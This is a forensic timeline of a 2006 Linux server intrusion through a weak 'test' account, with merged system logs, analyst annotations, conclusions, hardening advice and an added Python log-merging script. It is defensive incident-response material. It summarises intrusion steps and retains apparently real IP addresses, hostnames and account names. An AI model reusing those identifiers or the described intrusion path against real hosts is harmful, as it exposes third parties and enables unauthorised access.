2006/03/09 15:01:29 82.79.137.30     30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:29 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:01:30 82.79.137.30     30.metronetwork.rdsbz.ro - - [09/Mar/2006:15:01:30 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.60/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:01:34 82.79.137.6      Mar 9 15:01:34 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.6
2006/03/09 15:01:36 82.79.137.6      vsftpd: Thu Mar 9 15:01:36 2006 [pid 5944] [anonymous] FAIL LOGIN: Client "82.79.137.6"
2006/03/09 15:01:37 82.79.137.27     Mar 9 15:01:37 localhost vsftpd: (pam_unix) authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=82.79.137.27
2006/03/09 15:01:39 82.79.137.27     vsftpd: Thu Mar 9 15:01:39 2006 [pid 5946] [anonymous] FAIL LOGIN: Client "82.79.137.27"
2006/03/09 15:01:45 82.79.137.18 *   vsftpd: Thu Mar 9 15:01:45 2006 [pid 5963] [test] OK LOGIN: Client "82.79.137.18"
2006/03/09 15:01:47 82.79.137.9  *   vsftpd: Thu Mar 9 15:01:47 2006 [pid 5967] [test] OK LOGIN: Client "82.79.137.9"
2006/03/09 15:02:07 82.79.137.20     20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:07 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:08 82.79.137.20     20.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:08 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.59/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:35 82.79.137.18     18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:35 +0100] "GET / HTTP/1.1" 200 1053 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
2006/03/09 15:02:36 82.79.137.18     18.metronetwork.rdsbz.ro - - [09/Mar/2006:15:02:36 +0100] "GET /logowhite.png HTTP/1.1" 200 19801 "http://213.186.53.51/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)" "-"
ratibus pts/2 82.233.38.20 Thu Mar 16 23:13 - 23:14 (00:00)
2006/03/17 00:12:32 193.230.222.209 *   Mar 17 00:12:32 localhost sshd[30299]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3741 ssh2
2006/03/17 00:12:32 193.230.222.209 *   Mar 17 00:12:32 localhost sshd[30318]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:12    193.230.222.209 *   test pts/2 193.230.222.209 Fri Mar 17 00:12 - 00:30 (00:18)
2006/03/17 00:12:45 193.230.222.209 *!! Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) password changed for test
2006/03/17 00:12:45 193.230.222.209 *!! Mar 17 00:12:45 localhost passwd[30326]: (pam_unix) Password for test was changed
2006/03/17 00:15:35 193.230.222.209 *   Mar 17 00:15:35 localhost sshd[30439]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3744 ssh2
2006/03/17 00:15:35 193.230.222.209 *   Mar 17 00:15:35 localhost sshd[30454]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:15    193.230.222.209 *   test pts/3 193.230.222.209 Fri Mar 17 00:15 - 00:15 (00:00)
2006/03/17 00:15:52 193.230.222.209 *   Mar 17 00:15:52 localhost sshd[30454]: (pam_unix) session closed for user test
2006/03/17 00:17:28 193.230.222.209 *.  Mar 17 00:17:28 localhost su[30537]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=vinoj
2006/03/17 00:17:30 193.230.222.209 *.  Mar 17 00:17:30 localhost su[30537]: pam_authenticate: Authentication failure
2006/03/17 00:17:30 193.230.222.209 *.  Mar 17 00:17:30 localhost su[30537]: - pts/2 test:vinoj
2006/03/17 00:17:36 193.230.222.209 *.  Mar 17 00:17:36 localhost su[30547]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=vinoj
2006/03/17 00:17:38 193.230.222.209 *.  Mar 17 00:17:38 localhost su[30547]: pam_authenticate: Authentication failure
2006/03/17 00:17:38 193.230.222.209 *.  Mar 17 00:17:38 localhost su[30547]: - pts/2 test:vinoj
2006/03/17 00:18:42 193.230.222.209 .*  Mar 17 00:18:42 localhost sshd[30594]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=209-nat.s-man.net user=croulants
2006/03/17 00:18:45 193.230.222.209 .*  Mar 17 00:18:45 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
2006/03/17 00:18:51 193.230.222.209 .*  Mar 17 00:18:51 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
2006/03/17 00:18:59 193.230.222.209 .*  Mar 17 00:18:59 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
2006/03/17 00:19:10 193.230.222.209 .*  Mar 17 00:19:10 localhost sshd[30591]: error: PAM: Have exhasted maximum number of retries for service. for croulants from 209-nat.s-man.net
2006/03/17 00:19:10 193.230.222.209 .*  Mar 17 00:19:10 localhost sshd[30591]: Failed keyboard-interactive/pam for croulants from 193.230.222.209 port 3753 ssh2
2006/03/17 00:19:50 193.230.222.209 *.  Mar 17 00:19:50 localhost su[30638]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours
2006/03/17 00:19:52 193.230.222.209 *.  Mar 17 00:19:52 localhost su[30638]: pam_authenticate: Authentication failure
2006/03/17 00:19:52 193.230.222.209 *.  Mar 17 00:19:52 localhost su[30638]: - pts/2 test:trollingsecours
2006/03/17 00:19:57 193.230.222.209 *.  Mar 17 00:19:57 localhost su[30643]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours
2006/03/17 00:19:59 193.230.222.209 *.  Mar 17 00:19:59 localhost su[30643]: pam_authenticate: Authentication failure
2006/03/17 00:19:59 193.230.222.209 *.  Mar 17 00:19:59 localhost su[30643]: - pts/2 test:trollingsecours
2006/03/17 00:20:04 193.230.222.209 *.  Mar 17 00:20:04 localhost su[30644]: (pam_unix) authentication failure; logname=test uid=1024 euid=0 tty=pts/2 ruser=test rhost= user=trollingsecours
2006/03/17 00:20:06 193.230.222.209 *.  Mar 17 00:20:06 localhost su[30644]: pam_authenticate: Authentication failure
2006/03/17 00:20:06 193.230.222.209 *.  Mar 17 00:20:06 localhost su[30644]: - pts/2 test:trollingsecours
2006/03/17 00:26:26 193.230.222.253     193.230.222.253 - - [17/Mar/2006:00:26:26 +0100] "GET / HTTP/1.0" 200 1053 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:26:27 193.230.222.253     193.230.222.253 - - [17/Mar/2006:00:26:27 +0100] "GET /logowhite.png HTTP/1.0" 200 19801 "http://213.186.53.59/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:26:28 193.230.222.253     193.230.222.253 - - [17/Mar/2006:00:26:28 +0100] "GET /favicon.ico HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
2006/03/17 00:28:33 193.230.222.209 *   Mar 17 00:28:33 localhost sshd[31078]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3788 ssh2
2006/03/17 00:28:33 193.230.222.209 *   Mar 17 00:28:33 localhost sshd[31107]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 00:28    193.230.222.209 *   test pts/4 193.230.222.209 Fri Mar 17 00:28 - 00:30 (00:01)
2006/03/17 00:28:40 193.230.222.209 *!  Mar 17 06 00:28:40 0 ..c crw--w---- test tty /dev/pts/5
2006/03/17 00:29:02 193.230.222.209 *!  Mar 17 06 00:29:02 0 .a. crw--w---- test tty /dev/pts/5
2006/03/17 00:30:31 193.230.222.209 *   Mar 17 00:30:31 localhost sshd[31107]: (pam_unix) session closed for user test
2006/03/17 00:30:33 193.230.222.209 *   Mar 17 00:30:33 localhost sshd[30318]: (pam_unix) session closed for user test
Mar 17 06 06:35:02 0 m.c prw-r----- root adm /dev/xconsole
2006/03/17 09:00:52 193.230.222.209 *   Mar 17 09:00:52 localhost sshd[25229]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3050 ssh2
2006/03/17 09:00:52 193.230.222.209 *   Mar 17 09:00:52 localhost sshd[25263]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 09:00    193.230.222.209 *   test pts/4 193.230.222.209 Fri Mar 17 09:00 - 09:38 (00:37)
2006/03/17 09:03:43 193.230.222.209 *!  Mar 17 06 09:03:43 0 ..c crw--w---- test tty /dev/pts/6
2006/03/17 09:03:58 193.230.222.209 *!  Mar 17 06 09:03:58 0 .a. crw--w---- test tty /dev/pts/6
2006/03/17 09:38:33 193.230.222.209 *   Mar 17 09:38:33 localhost sshd[25263]: (pam_unix) session closed for user test
2006/03/17 12:19:43 193.230.222.209 *   Mar 17 12:19:43 localhost sshd[14815]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3222 ssh2
2006/03/17 12:19:43 193.230.222.209 *   Mar 17 12:19:43 localhost sshd[14834]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:19    193.230.222.209 *   test pts/3 193.230.222.209 Fri Mar 17 12:19 - 14:25 (02:05)
2006/03/17 12:26:01 193.230.222.209 *   Mar 17 12:26:01 localhost sshd[15484]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3338 ssh2
2006/03/17 12:26:01 193.230.222.209 *   Mar 17 12:26:01 localhost sshd[15511]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:26    193.230.222.209 *   test pts/4 193.230.222.209 Fri Mar 17 12:26 - 14:30 (02:04)
2006/03/17 12:32:44 193.230.222.209 *   Mar 17 12:32:44 localhost sshd[16030]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3353 ssh2
2006/03/17 12:32:44 193.230.222.209 *   Mar 17 12:32:44 localhost sshd[16037]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 12:32    193.230.222.209 *   test pts/7 193.230.222.209 Fri Mar 17 12:32 - 16:26 (03:53)
2006/03/17 14:25:38 193.230.222.209 *   Mar 17 14:25:38 localhost sshd[14834]: (pam_unix) session closed for user test
2006/03/17 14:30:58 193.230.222.209 *   Mar 17 14:30:58 localhost sshd[15511]: (pam_unix) session closed for user test
2006/03/17 14:36:43 193.230.222.209 *   Mar 17 14:36:43 localhost sshd[585]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3934 ssh2
2006/03/17 14:36:43 193.230.222.209 *   Mar 17 14:36:43 localhost sshd[671]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 14:36    193.230.222.209 *   test pts/3 193.230.222.209 Fri Mar 17 14:36 - 16:49 (02:12)
2006/03/17 14:59:56 193.230.222.209 *   Mar 17 14:59:56 localhost sshd[5706]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4025 ssh2
2006/03/17 14:59:56 193.230.222.209 *   Mar 17 14:59:56 localhost sshd[5714]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 15:00    193.230.222.209 *   test pts/4 193.230.222.209 Fri Mar 17 15:00 - 17:12 (02:12)
2006/03/17 15:03:26 193.230.222.209 *   Mar 17 15:03:26 localhost sshd[6092]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 4027 ssh2
2006/03/17 15:03:26 193.230.222.209 *   Mar 17 15:03:26 localhost sshd[6171]: (pam_unix) session opened for user test by (uid=0)
2006/03/17 15:03    193.230.222.209 *   test pts/8 193.230.222.209 Fri Mar 17 15:03 - 15:14 (00:10)
2006/03/17 15:14:06 193.230.222.209 *   Mar 17 15:14:06 localhost sshd[6171]: (pam_unix) session closed for user test
2006/03/17 16:26:40 193.230.222.209 *   Mar 17 16:26:40 localhost sshd[16037]: (pam_unix) session closed for user test
2006/03/17 16:49:15 193.230.222.209 *   Mar 17 16:49:15 localhost sshd[671]: (pam_unix) session closed for user test
2006/03/17 17:12:46 193.230.222.209 *   Mar 17 17:12:46 localhost sshd[5714]: (pam_unix) session closed for user test
2006/03/17
17:18 # ## First mails blocked... no contact outside is possible via the default IP source Mar 17 19:30:39 localhost sshd[1425]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1087 ssh2 skycode pts/3 213.49.238.76 Fri Mar 17 19:30 still logged in Mar 17 06 19:30:39 0 ..c crw--w---- skycode tty /dev/pts/3 Mar 17 19:30:50 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash Mar 17 19:33:45 localhost sshd[2170]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1089 ssh2 skycode pts/4 213.49.238.76 Fri Mar 17 19:33 still logged in Mar 17 06 19:33:45 0 ..c crw--w---- skycode tty /dev/pts/4 Mar 17 19:34:41 localhost sudo: skycode : TTY=pts/4 ; PWD=/home ; USER=root ; COMMAND=/bin/bash 2006/03/17 19:37:19 ! Mar 17 19:37:19 localhost su[2642]: + pts/4 root:test Mar 17 06 19:38:16 0 ..c crw--w---- root tty /dev/pts/7 2006/03/17 19:39:21 !! Mar 17 06 19:39:21 2467 m.c -rw-r----- root shadow /etc/shadow = test:$ passwd? 2006/03/17 19:39:21 !! Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) password changed for test 2006/03/17 19:39:21 !! Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) Password for test was changed 2006/03/17 19:40:12 ! Mar 17 19:40:12 localhost su[2763]: + pts/3 root:test 2006/03/17 19:40:19 ! Mar 17 06 19:40:19 4096 m.. drwxr-xr-x test test /home/test 2006/03/17 19:40:19 ! 4096 m.. drwx------ test test /home/test/.mc/cedit = test:$ mc? 2006/03/17 19:40:25 ! Mar 17 06 19:40:25 0 m.. -rw-r--r-- test test /home/test/.mc/history but test not loggued normally 2006/03/17 19:40:25 ! 35 m.. -rw-r--r-- test test /home/test/.mc/Tree or via ./go?? 2006/03/17 19:40:25 ! 4096 m.. drwxr-xr-x test test /home/test/.mc 2006/03/17 19:40:25 ! 32 m.. -rw-r--r-- test test /home/test/.mc/filepos => /tmp/crontab.Hq7als/crontab 1;0 => correspond to crontab -e in .bash_history?... 2006/03/17 19:40:25 ! 1945 m.. -rw-r--r-- test test /home/test/.mc/ini 2006/03/17 19:40:31 ! Mar 17 06 19:40:31 2117 m.. 
-rw------- test test /home/test/.bash_history phil pts/8 85.234.194.12 Fri Mar 17 20:08 - 20:19 (00:11) phil pts/8 85.234.194.12 Fri Mar 17 20:20 still logged in phil pts/14 85.234.194.12 Fri Mar 17 21:14 still logged in skycode pts/15 213.49.238.76 Fri Mar 17 21:39 still logged in Mar 17 06 21:05:08 0 m.. crw--w---- root tty /dev/pts/12 0 m.. crw------- phil tty /dev/pts/8 Mar 17 06 21:05:09 0 m.. crw--w---- test tty /dev/pts/5 Mar 17 06 21:05:10 0 ma. crw-rw-rw- root tty /dev/ptmx 0 m.. crw--w---- test tty /dev/pts/6 0 .a. crw------- phil tty /dev/pts/8 0 .a. crw-rw-rw- root tty /dev/tty 2006/03/17 21:10:59 # user.log: Mar 17 21:10:59 localhost rpc.mountd: export request from 127.0.0.1 2006/03/17 21:10:59 # user.log: Mar 17 21:10:59 localhost rpc.mountd: dump request from 127.0.0.1 2006/03/17 21:28:56 # Mar 17 21:28:56 localhost -- MARK -- 2006/03/17 21:30:03 # last occurence of 20060317 213003 start /sbin/modprobe -s -k -- net-pf-10 safemode=0 2006/03/17 21:30:03 # last occurence of 20060317 213003 probe ended 2006/03/17 21:45:04 # Mar 17 21:45:04 localhost snmpd[1467]: Connection from 127.0.0.1 2006/03/17 21:45:04 # Mar 17 21:45:04 localhost last message repeated 3 times 2006/03/17 21:48:56 # ## No MARK at 21:48:56 2006/03/17 21:50:05 # Mar 17 21:50:05 localhost snmpd[1467]: Connection from 127.0.0.1 2006/03/17 21:55 # ## No snmp at 21:55 TODO: ===== ftp repository of test?? /var/cache/tct
Conclusions
- Initial breach
  - an automatic tool scanning ftp accounts got in with the 'test' account
  - manual login attempts with the 'test' account followed
  - download of sniffers and brute-force tools for ssh
  - transfers over ftp
  - change of the 'test' password
  - 82.79.137.NN = NN.metronetwork.rdsbz.ro
  - 193.230.222.209 = 209-nat.s-man.net
- Counter-measures
  - don't use dummy passwords ;-)
  - don't grant ftp/ssh rights by default
    - sshd: use the "AllowUsers" keyword and explicitly add users when needed
  - don't grant internet access by default
    - iptables: cf. --uid-owner and the other --XXX-owner options of the owner match
      - on the OUTPUT chain, to stop unprivileged accounts from downloading malicious code
      - the owner match only sees locally generated packets, so it is valid in the OUTPUT (and POSTROUTING) chains only; to keep a bindshell from being reachable, give the INPUT chain a DROP policy and open only the ports of the services the host is meant to expose
- Timeline
  - Before and during the live forensic analysis we should have written down our own actions and the observable elements, rather than having to deduce them from the logs.
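The Timeline lesson is easier to act on when the merge of sources is mechanical and the responders' own footprints are labelled. The script below is an added example for this write-up, not part of the original analysis: it merges syslog lines (sshd, su, sudo, passwd), `last` output and TCT mactime lines into one sorted timeline, marks which entries are covered by the investigators' notes, and flags the two patterns visible in this incident, failed ssh logins from a host followed by an accepted one, and a password change paired with the su that preceded it. The input strings are constructed to resemble the excerpts above, the year 2006 is assumed because syslog and `last` carry none, and the ANALYST_NOTES list is a hypothetical stand-in for the hand-kept log of responder actions the write-up says was missing.

```python
"""Merge syslog, `last` and TCT mactime lines into one sorted timeline and
separate the investigators' own footprints from the intruder's.
Added example; the sample lines are constructed, not the original logs."""
import re
from collections import namedtuple
from datetime import datetime, timedelta

YEAR = 2006  # assumption: syslog and `last` print no year, the incident date supplies it

# Constructed sample input, modelled on the excerpts quoted in the timeline.
SYSLOG = """\
Mar 17 00:18:45 localhost sshd[30591]: error: PAM: Authentication failure for croulants from 209-nat.s-man.net
Mar 17 00:19:10 localhost sshd[30591]: Failed keyboard-interactive/pam for croulants from 193.230.222.209 port 3753 ssh2
Mar 17 00:19:52 localhost su[30638]: - pts/2 test:trollingsecours
Mar 17 00:28:33 localhost sshd[31078]: Accepted keyboard-interactive/pam for test from 193.230.222.209 port 3788 ssh2
Mar 17 19:30:39 localhost sshd[1425]: Accepted keyboard-interactive/pam for skycode from 213.49.238.76 port 1087 ssh2
Mar 17 19:30:50 localhost sudo: skycode : TTY=pts/3 ; PWD=/home/skycode ; USER=root ; COMMAND=/bin/bash
Mar 17 19:37:19 localhost su[2642]: + pts/4 root:test
Mar 17 19:39:21 localhost passwd[2713]: (pam_unix) password changed for test
"""
LAST = """\
test     pts/4        193.230.222.209  Fri Mar 17 00:28 - 00:30  (00:01)
skycode  pts/3        213.49.238.76    Fri Mar 17 19:30   still logged in
"""
MACTIME = """\
Mar 17 06 19:39:21     2467 m.c -rw-r-----  root     shadow   /etc/shadow
Mar 17 06 19:40:31     2117 m.. -rw-------  test     test     /home/test/.bash_history
"""
# Hypothetical notes of what the responders did, written down as they worked.
ANALYST_NOTES = [
    ("Mar 17 19:30", "skycode: ssh in from 213.49.238.76, sudo to root"),
    ("Mar 17 19:39", "skycode: su to test, set a new password to lock the account"),
]

Event = namedtuple("Event", "when source kind actor host detail")

SYSLOG_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ ([\w.-]+)(?:\[\d+\])?: (.*)$")
SSH_RE = re.compile(r"(Accepted|Failed) \S+ for (\S+) from (\S+) port \d+")
PAM_FAIL_RE = re.compile(r"Authentication failure for (\S+) from (\S+)")
SU_RE = re.compile(r"^([+-]) \S+ (\S+):(\S+)$")          # "+ pts/4 root:test" = success
PASSWD_RE = re.compile(r"password changed for (\S+)")
LAST_RE = re.compile(r"^(\S+)\s+\S+\s+(\S+)\s+\w{3} (\w{3} +\d+ \d\d:\d\d)")
MACTIME_RE = re.compile(r"^(\w{3} +\d+ \d\d \d\d:\d\d:\d\d)\s+\d+ ([mac.]{3}) \S+\s+(\S+)\s+\S+\s+(\S+)$")


def _ts(text, fmt):
    """Parse a year-less syslog/last timestamp, filling in YEAR."""
    return datetime.strptime(text, fmt).replace(year=YEAR)


def parse_syslog(text):
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        when, prog, msg = _ts(m.group(1), "%b %d %H:%M:%S"), m.group(2), m.group(3)
        kind, actor, host = prog, None, None
        if prog == "sshd" and (s := SSH_RE.search(msg)):
            kind, actor, host = "ssh-" + s.group(1).lower(), s.group(2), s.group(3)
        elif prog == "sshd" and (s := PAM_FAIL_RE.search(msg)):
            kind, actor, host = "ssh-failed", s.group(1), s.group(2)
        elif prog == "su" and (s := SU_RE.match(msg)):
            kind = "su-ok" if s.group(1) == "+" else "su-failed"
            actor = s.group(2) + "->" + s.group(3)
        elif prog == "passwd" and (s := PASSWD_RE.search(msg)):
            kind, actor = "passwd-changed", s.group(1)
        elif prog == "sudo":
            kind, actor = "sudo", msg.split(" : ")[0]
        events.append(Event(when, "syslog", kind, actor, host, msg))
    return events


def parse_last(text):
    return [Event(_ts(m.group(3), "%b %d %H:%M"), "wtmp", "login", m.group(1), m.group(2), line.strip())
            for line in text.splitlines() if (m := LAST_RE.match(line))]


def parse_mactime(text):
    # TCT mactime prints a two-digit year, so no YEAR assumption is needed here.
    return [Event(datetime.strptime(m.group(1), "%b %d %y %H:%M:%S"), "mactime",
                  "file-" + m.group(2), m.group(3), None, m.group(4))
            for line in text.splitlines() if (m := MACTIME_RE.match(line))]


def build_timeline():
    events = parse_syslog(SYSLOG) + parse_last(LAST) + parse_mactime(MACTIME)
    return sorted(events, key=lambda e: e.when)


def failed_then_accepted(events, window=timedelta(hours=1)):
    """Hosts that failed to log in and then got an 'Accepted' within `window`:
    the signature of a guess that eventually hit a weak account."""
    hits = {}
    for acc in (e for e in events if e.kind == "ssh-accepted"):
        failed = [e.actor for e in events if e.kind == "ssh-failed" and e.host == acc.host
                  and acc.when - window <= e.when < acc.when]
        if failed:
            hits[acc.host] = {"failed_users": failed, "accepted_as": acc.actor, "at": acc.when}
    return hits


def password_changes(events):
    """Each passwd change paired with the last successful su into that account."""
    out = []
    for pw in (e for e in events if e.kind == "passwd-changed"):
        sus = [e for e in events if e.kind == "su-ok"
               and e.actor.endswith("->" + pw.actor) and e.when <= pw.when]
        out.append((pw.actor, sus[-1].actor if sus else None, pw.when))
    return out


def attribute(events, notes=ANALYST_NOTES, slack=timedelta(minutes=2)):
    """Label an event 'analyst' when a responder note covers it, else 'unexplained'.
    Without such notes the responders' own logins, su and passwd changes have to be
    reverse-engineered from the logs, which is the lesson of the write-up."""
    times = [_ts(t, "%b %d %H:%M") for t, _ in notes]
    return [(e, "analyst" if any(abs(e.when - t) <= slack for t in times) else "unexplained")
            for e in events]


if __name__ == "__main__":
    tl = build_timeline()
    for e, who in attribute(tl):
        print(f"{e.when:%Y-%m-%d %H:%M:%S} {e.source:8} {who:11} {e.kind:15} {e.actor or '-':22} {e.detail}")
    print("guess-then-login:", failed_then_accepted(tl))
    print("password changes:", password_changes(tl))
```

On real data, replace the three embedded strings with /var/log/auth.log, the output of `last`, and the mactime output (here under /var/cache/tct). Two caveats the sample makes visible: the PAM lines name the client as 209-nat.s-man.net while the "Failed"/"Accepted" lines give 193.230.222.209, so failures are only grouped with the accept that shares the same host string unless a resolver step is added; and the syslog clock, the `last` minute resolution and the mactime seconds come from the same host, so a clock skew between them would not be detected by this merge.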